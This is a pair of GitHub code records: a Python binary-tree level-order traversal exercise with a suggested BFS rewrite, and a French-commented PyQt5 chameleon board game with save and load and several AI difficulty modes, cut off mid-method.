+{"seq_id":"32458775897","text":"\"\"\"\nGiven a binary tree, return the level order traversal of its\nnodes' values (ie, from left to right, level by level).\n\"\"\"\ndef getMaxDepth(root):\n    if root == None:\n        return 0\n    return max(getMaxDepth(root.left), getMaxDepth(root.right)) + 1\n\ndef levelOrderInternal(root, dipLen):\n    if root is None:\n        return []\n    if dipLen == 0:\n        return [root.value()]  # wrap in a list so the concatenations below work\n    return levelOrderInternal(root.left, dipLen-1) + levelOrderInternal(root.right, dipLen-1)\n    \ndef levelOrderTraversal(root):\n    maxDepth = getMaxDepth(root)\n    retArr = []\n    for i in range(maxDepth):\n        retArr.append(levelOrderInternal(root, i))\n    return retArr  # one sub-list of values per level\n\ndef levelOrderQueue(root):\n    queue = [root]\n    while len(queue) > 0:\n        currNode = queue.pop()\n        print(currNode)\n        if currNode.left:\n            queue.insert(0, currNode.left)\n        if currNode.right:\n            queue.insert(0, currNode.right)\n    \n    ","repo_name":"BassP97/CTCI","sub_path":"Med/levelOrderTraversal.py","file_name":"levelOrderTraversal.py","file_ext":"py","file_size_in_byte":914,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"}
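`levelOrderTraversal` above re-walks the tree once per level, which is O(n * depth) overall; a single BFS pass produces the same list of levels in O(n). A sketch using `collections.deque`, assuming the same `.left`/`.right`/`.value()` node interface the code above uses:

```python
from collections import deque

def level_order(root):
    # Single pass: each node is visited once and appended to the
    # sub-list matching its depth.
    levels = []
    if root is None:
        return levels
    queue = deque([(root, 0)])
    while queue:
        node, depth = queue.popleft()
        if depth == len(levels):
            levels.append([])
        levels[depth].append(node.value())
        if node.left:
            queue.append((node.left, depth + 1))
        if node.right:
            queue.append((node.right, depth + 1))
    return levels
```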
+{"seq_id":"74650756639","text":"import sys #Pour l'interface\nimport os #Pour la suppression du fichier de sauvegarde\nfrom jeu import * #Importation des éléments de jeu.py qui gèrent le gameplay\nfrom PyQt5 import QtGui, QtCore, QtWidgets, uic #Importations d'éléments de PyQt5\nfrom pygame import mixer #Pour gérer la musique de fond\nmixer.init() #On initialise un mixer\nmixer.music.load('jungle.mp3') #On charge la musique de fond\n\n\"\"\"@auteurs : Pierre Savignac et François Schmidt\"\"\"\n\n\nclass JeuUi(QtWidgets.QMainWindow):\n    \"\"\"La classe JeuUi correspond à la fenêtre de départ qui permet de choisir à quel mode de jeu\n    on veut jouer, de reprendre une partie sauvegardée, ou d'afficher les règles\"\"\"\n    def __init__(self):\n        QtWidgets.QMainWindow.__init__(self)\n        self.ui = uic.loadUi('interface.ui', self) #Chargement de l'interface associée\n        self.ui.bouton_un_joueur.clicked.connect(self.un_joueur) #Bouton pour le mode 1 joueur\n        self.ui.bouton_deux_joueurs.clicked.connect(self.deux_joueurs) #Bouton pour le mode 2 joueurs avec mise\n        self.ui.bouton_ia_facile.clicked.connect(self.ia_facile) #Bouton pour le mode IA facile\n        self.ui.bouton_ia_normale.clicked.connect(self.ia_normale) #Bouton pour le mode IA normale\n        self.ui.bouton_ia_difficile.clicked.connect(self.ia_difficile) #Bouton pour le mode IA difficile\n        self.ui.bouton_ia_impossible.clicked.connect(self.ia_impossible)#Bouton pour le mode IA très difficile\n        self.ui.regle.clicked.connect(self.regles_jeu) #Bouton pour afficher les règles du jeu\n        self.ui.sauveg.clicked.connect(self.recup_sauv) #Bouton pour reprendre la partie sauvegardée\n\n        self.ui.actionSupprimer_la_sauvegarde.triggered.connect(self.suppr) #Dans onglet options permettant de supprimer la sauvegarde\n        self.ui.actionQuitter.triggered.connect(self.close) #Dans onglet options pour quitter le jeu\n\n        self.c = Cameleon() #Création du caméléon\n        self.p = Plateau(7, 7, self.c,self) #Création du plateau avec les dimensions, le caméléon et l'interface en paramètres\n        self.a = Arbitre(self.p,self.c) #Création de l'arbitre (et donc de la mise) avec le plateau et le caméléon en paramètres\n\n        self.window2 = PlateauUi(self.p, self.a, 1) #Cette fenêtre est le plateau de jeu qui s'ouvrira une fois le mode choisi (initialisé mode 1 joueur)\n\n        palette = QtGui.QPalette() #Ces 4 lignes servent pour l'image d'arrière plan\n        pixmap = QtGui.QPixmap(\"fond_cameleon.jpg\")\n        palette.setBrush(QtGui.QPalette.Background, QtGui.QBrush(pixmap))\n        self.setPalette(palette)\n\n        
QtGui.QFontDatabase.addApplicationFont(\"Jungle Roar Bold.ttf\") #Importation de la police \"Jungle Roar\" dans python grace à QtGui\n self.label_2.setFont(QtGui.QFont('Jungle Roar',pointSize=28)) #Le titre de la fenêtre sera écrit avec cette police\n\n\n def un_joueur(self):\n self.window2 = PlateauUi(self.p, self.a,1) #Plateau avec un 1 en paramètre pour plateau 1 joueur\n self.window2.show() #On l'affiche\n self.a.mise_en_place_jetons() #On choisi une disposition aléatoire de jetons\n self.window2.actualiser_jetons() #On place les jetons sur le plateau\n self.a.nbre_joueurs=1 #Pour que window2.play() sache quel mode de jeu a été choisi\n self.close() #Fermeture du menu de selection\n mixer.music.play() #Permet de lancer la musique de fond\n\n def deux_joueurs(self):\n NamesUi(self).show() #On ouvre la fenêtre pour rentrer les noms des 2 joueurs\n self.close() #Fermeture du menu de selection\n\n def ia_facile(self):\n self.window2 = PlateauUi(self.p, self.a, 1) #Même principe que la méthode un_joueur()\n self.window2.show()\n self.a.mise_en_place_jetons()\n self.window2.actualiser_jetons()\n self.a.nbre_joueurs = 3\n self.a.difficulte_ia='Facile'\n self.close()\n mixer.music.play()\n\n def ia_normale(self):\n self.window2 = PlateauUi(self.p, self.a, 1) #Même principe que la méthode un_joueur()\n self.window2.show()\n self.a.mise_en_place_jetons()\n self.window2.actualiser_jetons()\n self.a.nbre_joueurs = 3\n self.a.difficulte_ia='Normale'\n self.close()\n mixer.music.play()\n\n def ia_difficile(self):\n self.window2 = PlateauUi(self.p, self.a, 1) #Même principe que la méthode un_joueur()\n self.window2.show()\n self.a.mise_en_place_jetons()\n self.window2.actualiser_jetons()\n self.a.nbre_joueurs = 3\n self.a.difficulte_ia='Difficile'\n self.close()\n mixer.music.play()\n\n def ia_impossible(self):\n self.window2 = PlateauUi(self.p, self.a, 1) # Même principe que la méthode un_joueur()\n self.window2.show()\n self.a.mise_en_place_jetons()\n self.window2.actualiser_jetons()\n self.a.nbre_joueurs = 3\n self.a.difficulte_ia = 'Impossible'\n self.close()\n mixer.music.play()\n\n def suppr(self): #Méthode permettant de supprimer le fichier de sauvegarde\n try:\n os.remove('sauvegarde.txt')\n except Exception:\n pass\n\n def regles_jeu(self):\n ReglesUi().show() #Affiche la fenêtre des règles du jeu\n self.close() #Ferme la fenêtre du menu\n\n def recup_sauv(self): #Cette méthode sert à relancer une partie sauvegardée\n fichier=True\n try: #On essaye d'ouvrir le fichier de sauvegarde s'il existe\n f = open('sauvegarde.txt', 'r')\n except EnvironmentError:\n fichier=False\n if fichier==True: #S'il existe\n self.p[self.p.c.pos[0], self.p.c.pos[1]] = 0 #On efface l'ancien caméléon sur le plateau\n f = open('sauvegarde.txt', 'r') #On ouvre le fichier de sauvegarde en mode lecture\n typ_interface = int(f.readline()) #La première ligne est un entier correspondant au type de partie\n a = f.readline() #La deuxième ligne correspond à la position du caméléon '30\" pour (3,0)\n self.p.c.pos = (int(a[0]), int(a[1])) #On replace le caméléon en conséquence\n self.p[self.p.c.pos[0], self.p.c.pos[1]] = 9 #Et on l'affiche sur la plateau\n plato = f.readline() #Composition du plateau\n compteur = 0\n for i in range(1, 6):\n for j in range(1, 6):\n self.p[i, j] = plato[compteur] #On reconstitue le plateau tel qu'il était\n compteur += 1\n ia=f.readline() #Difficulté de l'IA (Normale si c'est pas un mode avec ia)\n if typ_interface == 1: #Si c'est un mode solo\n self.window2 = PlateauUi(self.p, self.a, 1) 
#Plateau avec un 1 en paramètre pour plateau 1 joueur\n self.window2.show() #On l'affiche\n self.window2.actualiser_jetons() #On place les jetons sur le plateau\n self.a.nbre_joueurs = 1 #Pour que window2.play() sache quel mode de jeu a été choisi\n self.close() #Fermeture du menu de selection\n if typ_interface==3: #Pareil pour le mode avec ia\n self.window2 = PlateauUi(self.p, self.a, 1)\n self.window2.show()\n self.window2.actualiser_jetons()\n self.a.nbre_joueurs = 3\n self.a.difficulte_ia = ia\n self.close()\n if typ_interface==4: #Si c'est le mode 2 joueurs, des lignes supplémentaires on été écrites\n j1 = f.readline() #Le nom de joueur 1\n j2 = f.readline() #Le nom du joueur 2\n tour=int(f.readline()) #La variable tour_joueur pour savoir à qui c'est de jouer\n miz=int(f.readline()) #L'état de la mise\n deja_miz=eval(f.readline()) #Le booléen deja_mise. eval() permet de transformer 'True' en True de type booléen\n recet=eval(f.readline()) #Le booléen a_reset\n geton=int(f.readline()) #La variable jeton_mise\n pts1=int(f.readline()) #Le nombre de points du joueur 1\n pts2=int(f.readline()) #Le nombre de points du joueur 2\n topik=f.readline() #La phrase écrite en bas à droite\n self.a.liste_joueurs = [Joueur(j1[:-1]), Joueur(j2[:-1])] #On crée les joueurs dans la liste de joueurs de l'arbitre de window2\n self.a.liste_joueurs[0].points=pts1 #On leur redonne leurs points\n self.a.liste_joueurs[1].points=pts2\n self.window2 = PlateauUi(self.p, self.a,2) #2 en paramètre pour charger le plateau de 2 joueurs\n\n self.window2.tour_joueur = tour #On remet dans les bonnes variable les valeurs de ces variables\n self.window2.a.m.mise=miz\n self.window2.deja_mise=deja_miz\n self.window2.a_reset=recet\n self.window2.jeton_mise=geton\n self.window2.topic.setText(topik)\n self.window2.actu_sauvegarde() #La méthode actu_sauvegarde est dans la classe PlateauUi et permet d'actualiser tous ces changements\n\n self.window2.show() #Affichage du plateau\n self.window2.actualiser_jetons() #Affichage de ces derniers\n self.a.nbre_joueurs = 4 #Nbre_joueurs=4 pour le mode 2 joueurs avec mise\n self.window2.repaint() #Actualisation de l'interface\n self.close() #Fermeture du menu\n mixer.music.play()\n\n self.window2.sauv=True #Pour indiquer qu'on a chargé une partie sauvegardée\n f.close() #Fermeture du fichier de sauvegarde que l'on a ouvert\n\n\n\nclass NamesUi(QtWidgets.QMainWindow):\n \"\"\"Classe d'une fenêtre permettant de rentrer les noms des deux joueurs qui vont s'affronter dans le mode 2 joueurs\"\"\"\n def __init__(self,ui):\n QtWidgets.QMainWindow.__init__(self)\n QtGui.QFontDatabase.addApplicationFont(\"Jungle Roar Bold.ttf\") #Importation de la police \"Jungle Roar\". Bizarrement, il faut la mettre dans chaque classe... 
Et cela ne fonctionne pas en dehors d'une classe\n self.ui = uic.loadUi('names.ui', self) #On charge le bon fichier pour l'interface\n self.ui.bouton_jouer.clicked.connect(self.jouer) #Pour le bouton jouer qui lancera la fenêtre avec le plateau\n self.fenetre=ui #self.fenetre -> fenêtre ouverte avant celle-ci, de type JeuUi\n\n self.n1.setFont(QtGui.QFont('Jungle Roar', pointSize=19)) #Certains textes seront écrits avec cette police pour faire joli\n self.n2.setFont(QtGui.QFont('Jungle Roar', pointSize=19))\n self.label_2.setFont(QtGui.QFont('Jungle Roar', pointSize=22))\n\n palette = QtGui.QPalette() #Ces 4 lignes servent pour l'image d'arrière plan\n pixmap = QtGui.QPixmap(\"fond_names.jpg\")\n palette.setBrush(QtGui.QPalette.Background, QtGui.QBrush(pixmap))\n self.setPalette(palette)\n\n\n def jouer(self):\n #Lorsqu'on clique sur le bouton jouer\n name1 = self.nom_joueur_1.toPlainText() #On récupère les noms des joueurs\n name2 = self.nom_joueur_2.toPlainText()\n self.fenetre.a.liste_joueurs = [Joueur(name1), Joueur(name2)] #On crée les joueurs dans la liste de joueurs de l'arbitre de window2\n self.fenetre.window2 = PlateauUi(self.fenetre.p, self.fenetre.a, 2) #2 en paramètre pour charger le plateau de 2 joueurs\n self.fenetre.window2.show() #Affichage du plateau\n self.fenetre.a.mise_en_place_jetons() #Mise en place des jetons\n self.fenetre.window2.actualiser_jetons() #Affichage de ces derniers\n self.fenetre.a.nbre_joueurs = 4 #Nbre_joueurs=4 pour le mode 2 joueurs avec mise\n self.close() #On ferme cette fenêtre\n mixer.music.play() #On lance la musique de fond\n\n\n\nclass PlateauUi(QtWidgets.QMainWindow):\n \"\"\"Plateau de jeu\"\"\"\n def __init__(self,plat,arb,typ):\n QtWidgets.QMainWindow.__init__(self)\n QtGui.QFontDatabase.addApplicationFont(\"Jungle Roar Bold.ttf\") #On importe la police dans cette classe\n\n if typ==1:\n self.ui = uic.loadUi('plat.ui', self) #Si typ==1, alors on charge le plateau 1 joueur\n self.titre.setFont(QtGui.QFont('Jungle Roar', pointSize=28))\n self.ui.actionSauvegarder_et_quitter.triggered.connect(self.sauvegarder_j1) #Onglet du menu permettant de sauvegarder en mode 1 joueur\n if typ==2:\n self.ui = uic.loadUi('plat2.ui', self) #Sinon, on charge le plateau 2 joueurs qui est différent\n self.nom_j1.setFont(QtGui.QFont('Jungle Roar', pointSize=16))\n self.nom_j2.setFont(QtGui.QFont('Jungle Roar', pointSize=16))\n self.ui.actionSauvegarder_et_quitter.triggered.connect(self.sauvegarder_j2) #Onglet du menu permettant de sauvegarder en mode 2 joueurs\n\n self.ui.actionRetour_menu.triggered.connect(self.retour_menu) #Si on clique sur l'onglet retour menu, la méthode retour_menu se lancera (devinez ce qu'elle va faire..)\n\n self.c_rouge = QtGui.QPixmap('insect_rouge.png') #On charge les images des jetons\n self.c_vert = QtGui.QPixmap('insect_vert.png')\n self.c_jaune = QtGui.QPixmap('insect_jaune.png')\n self.c_bleu = QtGui.QPixmap('insect_bleu.png')\n self.c_gris = QtGui.QPixmap('insect_gris.png')\n self.c_mort = QtGui.QPixmap('insect_mort.png')\n\n self.c_cameleon = QtGui.QPixmap('camé.jpg') #On charge les images du caméléon\n self.cameleon_haut= QtGui.QPixmap('cam_haut.png')\n self.cameleon_bas= QtGui.QPixmap('cam_bas.png')\n self.cameleon_gauche= QtGui.QPixmap('cam_gauche.png')\n self.cameleon_droite= QtGui.QPixmap('cam_droite.png')\n\n self.c_vide = QtGui.QPixmap('vide.jpg') #On charge quelques images utiles\n self.c_rien = QtGui.QPixmap('rien.png') #Un png sans fond\n self.jeton= QtGui.QPixmap('jeton_mise.png')\n self.haut= 
QtGui.QPixmap('branche_bas.png') #Les contours du terrain avec des branches pour le délimiter\n self.bas= QtGui.QPixmap('branche_haut.png')\n self.droite= QtGui.QPixmap('branche_gauche.png')\n self.gauche= QtGui.QPixmap('branche_droite.png')\n\n palette = QtGui.QPalette() #Ces 4 lignes servent pour l'image d'arrière plan (elles n'ont pas changé)\n pixmap = QtGui.QPixmap(\"arrierPlanBlanchi2.jpg\")\n palette.setBrush(QtGui.QPalette.Background, QtGui.QBrush(pixmap))\n self.setPalette(palette)\n\n self.p = plat #On récupère le plateau provenant de window en argument de la classe\n self.a = arb #De même pour l'arbitre\n\n if typ == 2: #Si c'est le plateau 2 joueurs\n self.nom_j1.setText(str(self.a.liste_joueurs[0].id)) #On affiche le nom des joueurs au bon endroit\n self.nom_j2.setText(str(self.a.liste_joueurs[1].id))\n self.indic.setFont(QtGui.QFont('Jungle Roar', pointSize=18)) #Avec la jolie police\n self.indic.setText(str(self.a.liste_joueurs[0].id)+', a toi de jouer') #On indique à qui c'est de jouer\n self.ui.mise_j1.clicked.connect(self.miser_j1) #On paramètre les boutons pour les mises\n self.ui.mise_j2.clicked.connect(self.miser_j2)\n self.score_j1.setFont(QtGui.QFont('Jungle Roar', pointSize=14)) #Et encore de la modification de police\n self.score_j2.setFont(QtGui.QFont('Jungle Roar', pointSize=14))\n self.affichage_mise.setFont(QtGui.QFont('Jungle Roar', pointSize=20))\n self.topic.setFont(QtGui.QFont('Jungle Roar', pointSize=16))\n\n self.choix_ui=42 #On initalise le choix de ce que le joueur veut manger à un valeur bidon\n self.resultats=ScoresUi(self) #Resultats sera l'interface qui affichera les résultats\n self.mise=MiseUi(self) #Mise sera l'interface pour accepter ou refuser une augmentation de mise\n self.peut_jouer=True #Permet de savoir si le joueur peut jouer (et qu'il clique pas partout pendant le tour de l'ordi pour tout faire planter)\n self.a_reset=False #Permet de savoir si la méthode PlateauUi.reset() a été utilisée\n\n self.tour_joueur = 1 #Permet de savoir à qui c'est le tour\n self.deja_mise=False #Permet de savoir si on a deja fait une surrenchère de mise ce tour\n self.jeton_mise=0 #Indique où est le jeton de mise (0 au milieur, 1 joueur 1, et 2 joueur 2)\n self.sauv=False #Permet de savoir si on joue une partie sauvegardée\n\n\n def actu_sauvegarde(self):\n \"\"\"Pour réinitialiser le plateau correctement lorsqu'on relance une partie\n que l'on a sauvegardée\"\"\"\n if self.tour_joueur % 2 == 1 or self.tour_joueur == 1:\n self.indic.setText(str(self.a.liste_joueurs[0].id) + ', a toi de jouer') #On indique à qui c'est de jouer\n else:\n self.indic.setText(str(self.a.liste_joueurs[1].id) + ', a toi de jouer')\n self.affichage_mise.setText('Mise : ' + str(self.a.m)) #On affiche la nouvelle valeur de mise\n if self.jeton_mise==0:\n self.jeton_j1.setPixmap(self.c_rien) #On supprime le jeton de mise sur le plateau\n self.jeton_j2.setPixmap(self.c_rien)\n elif self.jeton_mise==1: #Et on le remet où il faut\n self.jeton_j1.setPixmap(self.jeton.scaled(self.jeton_j1.size(),QtCore.Qt.IgnoreAspectRatio,QtCore.Qt.SmoothTransformation)) # On supprime le jeton de mise sur le plateau\n self.jeton_j2.setPixmap(self.c_rien)\n elif self.jeton_mise==2:\n self.jeton_j1.setPixmap(self.c_rien)\n self.jeton_j2.setPixmap(self.jeton.scaled(self.jeton_j2.size(),QtCore.Qt.IgnoreAspectRatio,QtCore.Qt.SmoothTransformation))\n self.score_j1.setText('Score : ' + str(self.a.liste_joueurs[0].points)) #On actualise les scores\n self.score_j2.setText('Score : ' + 
str(self.a.liste_joueurs[1].points))\n self.sauv=True #On indique que joue une partie sauvegardée\n self.repaint() #On actualise l'affichage\n\n\n def sauvegarder_j1(self): #Sauvegarde d'un plateau type 1\n f=open('sauvegarde.txt','w') #On ouvre/crée le fichier de sauvegarde\n f.write(str(self.a.nbre_joueurs)+'\\n') #On écrit le type\n f.write(str(self.p.c.pos[0])+str(self.p.c.pos[1])+'\\n') #La position du caméléon\n for i in range(1,6):\n for j in range(1,6):\n f.write(str(int(self.p[i,j]))) #La composition du plateau de jeu\n f.write('\\n'+self.a.difficulte_ia) #La difficulté de l'ia ('normale' si mode 1 joueur)\n f.close() #On ferme le fichier\n self.retour_menu() #Et on appelle la méthode self.retour_menu() qui retourne au menu\n\n def sauvegarder_j2(self): #Pareil qu'au dessus\n f=open('sauvegarde.txt','w')\n f.write(str(self.a.nbre_joueurs)+'\\n')\n f.write(str(self.p.c.pos[0])+str(self.p.c.pos[1])+'\\n')\n for i in range(1,6):\n for j in range(1,6):\n f.write(str(int(self.p[i,j])))\n f.write('\\n'+self.a.difficulte_ia+'\\n')\n f.write(self.a.liste_joueurs[0].id) #Mais on enregistre quelques données en plus comme les noms de joueurs\n f.write('\\n')\n f.write(self.a.liste_joueurs[1].id)\n f.write('\\n')\n f.write(str(self.tour_joueur)) #A qui c'est de jouer\n f.write('\\n')\n f.write(str(self.a.m.mise)) #La mise\n f.write('\\n')\n f.write(str(self.deja_mise)) #La variable booléenne deja_mise\n f.write('\\n')\n f.write(str(self.a_reset)) #La variable booléenne a_reset\n f.write('\\n')\n f.write(str(self.jeton_mise)) #L'entier jeton mise\n f.write('\\n')\n f.write(str(self.a.liste_joueurs[0].points)) #Le nombre de points des joueurs\n f.write('\\n')\n f.write(str(self.a.liste_joueurs[1].points))\n f.write('\\n')\n f.write(str(self.topic.text())) #La phrase écrite en bas à droite\n f.close()\n self.retour_menu() #Et on retourne au menu\n\n\n def retour_menu(self): #Cette fonction permet de retourner à l'écran titre pendant la partie\n self.close() #On ferme la fenêtre plateau\n JeuUi().show() #Et on réouvre un nouveau menu\n\n\n def mousePressEvent(self, event):\n \"\"\"Méthode qui se lance quand on clique et qui retourne des coordonées\"\"\"\n if event.button() == QtCore.Qt.LeftButton:\n self.info.setText(' ') #On réinitialise ce champs de texte\n coords = [event.x(), event.y()] #Coordonées du clic\n if self.peut_jouer==True: #Si on peut jouer\n l = 215 #Ordonnée du coin haut gauche du plateau\n L = 345 #Abscisse du coin haut droit du plateau\n i = 0\n j = 0\n while coords[0] > L + j * 83: #83 car 80 pixels de largeur de case + 3 pixels d'interstice entre 2 cases\n j += 1\n while coords[1] > l + i * 83:\n i += 1\n #i et j sont la ligne et la colonne de l'endroit cliqué\n if i==self.p.c.pos[0] and j==self.p.c.pos[1]: #Si on clique sur le caméléon\n self.info.setText(\"Ne te mange pas toi même s'il te plaît\") #On affiche un petit message rigolo (dédicace à Marceau Michel)\n if (i >= 1 and i <= 5) and (j >= 1 and j <= 5) and self.peut_jouer == True: #Si on clique sur une case dans le plateau et qu'on peut jouer\n if self.p.c.pos[0] == i: #Si on mange dans une ligne\n self.choix_ui = self.p[i, j] #Le choix est le type de jeton sur lequel on clique. 
C'est ici que le choix prend sa valeur !\n                if self.p[i, j] != 0: #Et si c'est pas un jeton déjà mangé\n                    self.play() #On peut jouer\n            elif self.p.c.pos[1] == j: #Si on mange dans une colonne\n                self.choix_ui = self.p[i, j] #La même\n                if self.p[i, j] != 0:\n                    self.play()\n        else: #Si on clique en dehors du plateau\n            pass #Bah on fait rien\n\n\n    def play(self):\n        \"\"\"Méthode qui remplace la méthode Arbitre.jouer() permettant donc d'articuler le jeu.\n        Elle appelle les méthodes de la classe Arbitre de jeu.py qui ont été conçues pour faire fonctionner le jeu\"\"\"\n        if self.a.nbre_joueurs==1: #Si c'est le mode 1 joueur\n            self.p.un_tour_joueur() #On fait jouer en appelant Plateau.un_tour_joueur()\n            self.actualiser_jetons() #On actualise les jetons\n            if self.a.p.menu == [0.0, 0.0, 0.0, 0.0, 0.0]: #Si on se retrouve face à une ligne/colonne de 0\n                self.resultats.show() #On affiche la fenêtre résultat parce que la partie est terminée\n                if self.a.jetons_restants()==0: #S'il reste 0 jetons\n                    self.resultats.message.setText('Vous gagnez !') #On affiche qu'il a gagné\n                else: #Sinon\n                    self.resultats.message.setText('Il vous reste ' + str(self.a.jetons_restants()) + ' jetons') #On affiche le nombre de jetons restants\n\n        elif self.a.nbre_joueurs==3: #Mode avec IA\n            self.p.un_tour_joueur() #On fait jouer le joueur\n            self.actualiser_jetons() #On actualise le plateau\n            self.repaint() #On rafraîchit l'interface --> permet au joueur de jouer, attendre (avec l'actualisation puis le time.sleep), puis l'ordi joue\n            if self.a.p.menu == [0.0, 0.0, 0.0, 0.0, 0.0]: #Si on est face à une ligne de 0\n                self.resultats.show() #On ouvre la fenêtre de résultat car on a gagné\n                self.resultats.message.setText(\"Vous gagnez\") #Avec le message suivant\n            else: #Sinon, c'est au tour de l'ordi\n                self.peut_jouer=False #Peut_jouer=False pour pas que le joueur clique partout et interfère avec le plateau quand l'ordi joue\n                self.ui.info.setText(\"L'ordi joue\") #On précise que l'ordi joue\n                self.repaint() #On actualise l'interface pour que le message s'affiche\n                time.sleep(1) #On attend une seconde pour que le joueur se rende compte de ce qui a été joué\n                if self.a.difficulte_ia == 'Facile': #Si l'IA est facile\n                    self.p.un_tour_ia_facile() #On appelle cette fonction\n                if self.a.difficulte_ia == 'Normale': #Si l'IA est normale\n                    self.p.un_tour_ia_normale() #On appelle celle-là\n                    if self.p.coup_gagnant == False: #Si on a pas trouvé de coup gagnant, Arbitre.coup_gagnant est faux\n                        self.p.un_tour_ia_facile() #Donc on joue au hasard en appelant l'IA facile\n                if self.a.difficulte_ia == 'Difficile': #Si l'IA est difficile\n                    self.p.un_tour_ia_difficile() #On appelle cette fonction\n                if self.a.difficulte_ia == 'Impossible':#Si l'IA est très difficile\n                    self.p.un_tour_ia_impossible() #On appelle cette fonction\n                self.actualiser_jetons() #On actualise le plateau\n                if self.a.p.menu == [0.0, 0.0, 0.0, 0.0, 0.0]: #Si on se retrouve face à une ligne/colonne de 0\n                    self.resultats.show() #On affiche la fenêtre résultats\n                    self.resultats.message.setText(\"L'ordi gagne\") #Et on dit que l'ordi gagne\n                self.peut_jouer = True #Le joueur peut rejouer\n\n        elif self.a.nbre_joueurs==4: #Mode deux joueurs avec mise\n            self.a_reset=False #a_reset initialisé à False\n            if self.tour_joueur%2==1 or self.tour_joueur==1: #Si c'est au tour du joueur 1\n                self.p.un_tour_joueur_mise(self.a) #On appelle la fonction Plateau.un_tour_joueur_mise pour le tour du J1\n                self.actualiser_jetons() #On actualise le plateau\n                self.indic.setText(str(self.a.liste_joueurs[1].id)+', a toi 
de jouer') #On indique que c'est au joueur 2 de jouer\n                if self.a.p.menu == [0.0, 0.0, 0.0, 0.0, 0.0] and (self.a.liste_joueurs[0].points+self.a.m.mise)>=5: #Si le joueur 2 perd la manche et que le joueur 1 atteint au moins 5 points\n                    self.a.liste_joueurs[0].points += self.a.m.mise #On augmente les points du joueur 1\n                    self.score_j1.setText('Score : ' + str(self.a.liste_joueurs[0].points)) #On actualise son score\n                    if self.a.m.mise>1:\n                        self.topic.setText(str(self.a.liste_joueurs[0].id) + ' a gagne ' + str(self.a.m.mise) + ' points') #On précise que le joueur 1 a gagné tant de points\n                    else:\n                        self.topic.setText(str(self.a.liste_joueurs[0].id) + ' a gagne ' + str(self.a.m.mise) + ' point') #On précise que le joueur 1 a gagné tant de points\n                    self.resultats.show() #On affiche la fenêtre de résultats\n                    self.resultats.message.setText(str(self.a.liste_joueurs[0].id)+\" gagne avec : \"+str(self.a.liste_joueurs[0].points)+\" points\") #On indique que le joueur 1 a remporté la partie\n                elif self.a.p.menu == [0.0, 0.0, 0.0, 0.0, 0.0]: #Si le joueur 2 perd la manche mais le joueur 1 n'a pas les 5 points pour gagner la partie\n                    self.peut_jouer=False\n                    self.repaint()\n                    time.sleep(0.5)\n                    self.peut_jouer=True\n                    self.a.liste_joueurs[0].points+=self.a.m.mise #On augmente les points du joueur 1\n                    self.score_j1.setText('Score : '+str(self.a.liste_joueurs[0].points)) #On actualise son score\n                    if self.a.m.mise>1:\n                        self.topic.setText(str(self.a.liste_joueurs[0].id)+' a gagne '+str(self.a.m.mise)+' points') #On affiche combien de points il a gagné\n                    else:\n                        self.topic.setText(str(self.a.liste_joueurs[0].id)+' a gagne '+str(self.a.m.mise)+' point') #On affiche combien de points il a gagné\n                    self.reset() #On reset le plateau\n\n            if self.tour_joueur%2==0: #Strictement identique au if au-dessus mais avec le joueur 2\n                self.p.un_tour_joueur_mise(self.a)\n                self.actualiser_jetons()\n                self.indic.setText(str(self.a.liste_joueurs[0].id)+', a toi de jouer')\n                if self.a.p.menu == [0.0, 0.0, 0.0, 0.0, 0.0] and (self.a.liste_joueurs[1].points+self.a.m.mise)>=5:\n                    self.a.liste_joueurs[1].points += self.a.m.mise\n                    self.score_j2.setText('Score : ' + str(self.a.liste_joueurs[1].points))\n                    if self.a.m.mise>1:\n                        self.topic.setText(str(self.a.liste_joueurs[1].id)+' a gagne '+str(self.a.m.mise)+' points')\n                    else:\n                        self.topic.setText(str(self.a.liste_joueurs[1].id)+' a gagne '+str(self.a.m.mise)+' point')\n                    self.resultats.show()\n                    self.resultats.message.setText(str(self.a.liste_joueurs[1].id)+\" gagne avec : \"+str(self.a.liste_joueurs[1].points)+\" points\")\n                elif self.a.p.menu == [0.0, 0.0, 0.0, 0.0, 0.0]:\n                    self.peut_jouer=False\n                    self.repaint()\n                    time.sleep(0.5)\n                    self.peut_jouer=True\n                    self.a.liste_joueurs[1].points+=self.a.m.mise\n                    self.score_j2.setText('Score : '+str(self.a.liste_joueurs[1].points))\n                    if self.a.m.mise>1:\n                        self.topic.setText(str(self.a.liste_joueurs[1].id)+' a gagne '+str(self.a.m.mise)+' points')\n                    else:\n                        self.topic.setText(str(self.a.liste_joueurs[1].id)+' a gagne '+str(self.a.m.mise)+' point')\n                    self.reset()\n            if self.a_reset==False: #Si ça n'a pas été reset, on augmente tour_joueur pour qu'au prochain appel, ce soit le joueur suivant qui joue\n                self.tour_joueur += 1 #Parce que dans le reset, on remet le numéro de joueur à 1\n            self.p.annulation=False #On réinitialise : annulation,\n            self.p.rejouer=False #Rejouer,\n            self.deja_mise=False #Et deja_mise\n            self.affichage_mise.setText('Mise : ' + str(self.a.m)) #Et on met à jour la mise\n\n\n    def reset(self):\n        self.a_reset=True #On indique que le plateau a été 
réinitialisé\n self.a.m.mise=1 #On remet la mise à 1\n self.jeton_mise=0 #On remet le jeton de mise au milieu\n self.jeton_j1.setPixmap(self.c_rien) #On supprime le jeton de mise sur le plateau\n self.jeton_j2.setPixmap(self.c_rien)\n self.indic.setText(str(self.a.liste_joueurs[0].id) + ' a toi de jouer') #On le précise sur l'interface\n self.a.mise_en_place_jetons() #On remet des jetons aléatoirement\n self.a.p.calcul_menu(self.a.c.pos[0], self.a.c.pos[1]) #On recalcule le menu\n self.actualiser_jetons() #On actualise le plateau\n self.tour_joueur=1 #On redemande au joueur 1 de jouer\n self.repaint() #Et on actualise l'interface\n\n\n def miser_j1(self):\n if (self.tour_joueur==1 or self.tour_joueur%2==1) and self.a.m.mise<5 and self.deja_mise==False and (self.jeton_mise==0 or self.jeton_mise==2): #Si c'est le tour du joueur 1 et qu'il a pas déja misé\n self.deja_mise=True #On dit qu'il a misé\n self.jeton_mise=1 #Le joueur 1 a le jeton de mise et ne peut plus surrencherir\n self.jeton_j1.setPixmap(self.jeton.scaled(self.jeton_j1.size(),QtCore.Qt.IgnoreAspectRatio,QtCore.Qt.SmoothTransformation)) #On place le jeton sur l'emplacement en dessous du score du Joueur 1\n self.jeton_j2.setPixmap(self.c_rien) #Rien pour le joueur 2\n self.mise.acc.setText(str(self.a.liste_joueurs[1].id) + \" acceptes-tu l'augmentation de mise ?\") #Texte pour la phrase sur la fenêtre de mise\n self.mise.show() #On affiche la fenêtre des mises\n\n\n def miser_j2(self): #Pareil mais pour le joueur 2\n if self.tour_joueur%2==0 and 